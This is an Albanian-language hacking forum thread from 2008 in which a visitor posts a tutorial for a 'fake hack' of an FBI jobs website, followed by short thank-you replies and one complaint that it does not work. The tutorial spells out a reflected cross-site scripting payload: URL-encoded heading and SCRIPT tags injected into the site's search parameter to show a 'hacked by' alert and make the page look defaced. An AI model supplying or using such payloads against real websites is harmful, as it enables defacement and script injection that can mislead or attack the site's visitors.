ForumCalendarPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 Fake Hack ( FBI )

Shko poshtė 
AutoriMesazh
Musafir
Vizitor
avatar


MesazhTitulli: Fake Hack ( FBI )   Sat Jul 19, 2008 7:00 am

Fake hack FBI
-----------------------

Ne kete tutorial do te keni rastin te mesoni se si te krijojn nje script te rrejshem
qe duket sikur e kemi hakeruar webfaqen e FBI.

Se pari shkojm ne website http://www.fbijobs.gov dhe kerkojm ne search box me titullin qe
ju doni te duket p.sh.: "Ju jini kejt llamera"
Dhe do te na shfaqet faqja me linkun: http://www.fbijobs.gov/searchresult.asp
Me pas kti linku ja shtojm edhe pjesen tjeter se bashku me ate qe keni keruar p.sh.:

shtoni kete pjes pas:: http://www.fbijobs.gov/searchresult.asp + SearchString=%3Ch1%3EJu jini kejt Llamera

http://www.fbijobs.gov/searchresult.asp ... %3Ch1%3EJu jini kejt Llamera

dhe me pas i shtoni komanden per te shfaur Message Boxin.:
pra linkut ja shton kete ::
/h1%3E%3CSCRIPT%3Ealert('hackedbyTutoriale-Al=)');%3C/SCRIPT%3E%3CIMG%20SRC=%

Dhe behet
http://www.fbijobs.gov/searchresult.asp ... %3Ch1%3EJu jini kejt Llamera
/h1%3E%3CSCRIPT%3Ealert('hackedbyTutoriale-Al=)');%3C/SCRIPT%3E%3CIMG
Mbrapsht nė krye Shko poshtė
cRackeR-Bu.RiM
Administrator
Administrator
avatar

Numri i postimeve : 306
Registration date : 15/07/2008

MesazhTitulli: Re: Fake Hack ( FBI )   Sat Jul 19, 2008 12:18 pm

thnxx njerii Wink
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://al-crew.co.nr
Musafir
Vizitor
avatar


MesazhTitulli: Re: Fake Hack ( FBI )   Thu Jul 24, 2008 4:35 am

flmm knickss Wink Wink
Mbrapsht nė krye Shko poshtė
BigYY

avatar

Numri i postimeve : 4
Registration date : 13/08/2008

MesazhTitulli: Re: Fake Hack ( FBI )   Wed Aug 13, 2008 3:27 am

B-CRACKER shkruajti:
thnxx njerii Wink
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
shllakk1.
Designer
Designer
avatar

Numri i postimeve : 115
Registration date : 19/07/2008

MesazhTitulli: shllakk1.   Wed Aug 13, 2008 8:54 am

shoq ky sen nuk po funksionojka nese Funksionon e bon 1 tutotrial nese nuk priton, edhe e poston.
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
Sponsored content
MesazhTitulli: Re: Fake Hack ( FBI )   

Mbrapsht nė krye Shko poshtė
 
Fake Hack ( FBI )
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Hacking :: Tutoriales / Mesime-
Kėrce tek: